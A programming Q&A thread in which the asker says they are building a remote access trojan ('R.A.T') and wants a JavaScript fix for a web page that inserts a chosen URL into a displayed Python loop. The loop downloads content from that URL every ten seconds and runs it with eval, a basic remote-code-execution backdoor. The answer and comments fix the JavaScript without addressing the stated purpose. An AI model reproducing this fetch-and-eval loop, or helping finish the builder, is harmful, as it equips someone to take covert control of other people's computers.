# How do I replace text in h1 tag using Javascript?

Tags: javascript, python, html

The thing is I am trying to make a R.A.T in python for educational purposes obviously and I have coded a simple html website that is meant to change url4python1 to be replaced with the url the user typed in and the python code will then execute the code on the url

```html
<!DOCTYPE html>
<h1>Kingpin V1.0</h1>
<title>Kingpin</title>
<p>Raw URL:</p>
<input id="solidmate"></input> <button onclick="document.getElementById('url4python').innerText.replace('url4python' , document.getElementById('solidmate').innerText )">Submit</button>
<br></br>
<h1>
    import requests <p></p>
    import time <p></p>

    import os <p></p>
    while True: <p></p>
    <p id="url4python">url4python = "url4python1"</p>
    r1 = requests.get('' + url4python) 
    eval(r1.content) <p></p>
    time.sleep(10) <p></p>
</h1>
```

I have googled this problem to no avail and I found a stackoverflow question about this problem here: [How can I replace the text in an <h1> from a CSS file without using a <span> tag?](https://stackoverflow.com/questions/26888798/how-can-i-replace-the-text-in-an-h1-from-a-css-file-without-using-a-span-tag)

but it was to no use because people kept discouraging the Original Poster and now I have no clue what the answer is!

Comment: `.replace()` doesn't replace in place.

Comment: Why are you using an h1 tag? That is not a heading. The HTML is invalid since an `h1` can not have a `p` element as a child. Your HTML has a lot of errors in it. Put it in a HTML validator. An input does not have innerText

Comment: Shouldn't HTML normally have an HTML tag? Head? Body? :'D

Answer (score 0):

`replace()` doesn't operate in place, it returns a new string. You need to assign this back to the `innerText`.

And to get the value of the input, you have to use `.value`, not `.innerText`.

```
onclick="document.getElementById('url4python').innerText = document.getElementById('url4python').innerText.replace('url4python' , document.getElementById('solidmate').value )"
```

Comment: Still not going to work because it is not going to read the input.

Comment: Fixed that now.